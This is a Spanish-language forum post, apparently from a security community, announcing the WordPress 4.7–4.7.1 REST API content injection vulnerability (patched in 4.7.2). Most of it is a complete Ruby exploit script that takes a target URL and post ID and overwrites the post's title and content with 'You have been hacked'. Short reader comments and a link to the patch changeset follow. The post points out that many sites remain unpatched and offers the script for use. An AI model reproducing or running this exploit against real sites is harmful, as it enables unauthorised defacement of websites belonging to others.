Seguramente muchos de los usuarios de la comunidad dragonjar ya saben que acaba de salir un fallo critico para wordpress que permite inyectar contenido en un blog con este sistema, los desarrolladores trabajaron en conjunto con los hackers que encontraron el fallo, para publicar una actualización de forma silenciosa y dar tiempo para que corrigieran la mayoría de personas actualizaran sus sitios y corrigieran el problema, pero muchos sitios siguen sin actualizar y vulnerables.
aqui les dejo un video de la prueba de concepto
este es el exploit 0day de Wordpress
# Exploit Title: WP Content Injection
# Date: 31 Jan' 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: Backbox ubuntu Linux
# Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Credits : Marc, Sucuri, Brute
# usage : gem install rest-client
# Lang : Ruby
require 'rest-client'
require 'json'
puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i
response = RestClient.post(
"#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
{
"id" => "#{postid}justrawdata",
"title" => "You have been hacked",
"content" => "Hacked please update your wordpress version"
}.to_json,
:content_type => :json,
:accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts "Done! '#{targeturi}/index.php?p=#{postid}'"
else
puts "This site is not Vulnerable"
end
Pareces nuevo por aquí. Si quieres participar, ¡pulsa uno de estos botones!
Comentarios
Me hubiera gustado que crees un script con funciones propias y explicación breve; ósea poner algo de valor agregado en vez de colgar solo un video y el Bug, pero de todas maneras gracias por el aporte.
No tengo mucho más que aportar, de pronto estos cambios puntuales que se hicieron entre versión y versión, que nos ayudarán a entender mejor el código.
https://core.trac.wordpress.org/changeset?old_path=/tags/4.7.1&old=&new_path=/tags/4.7.2&new=&sfp_email=&sfph_mail=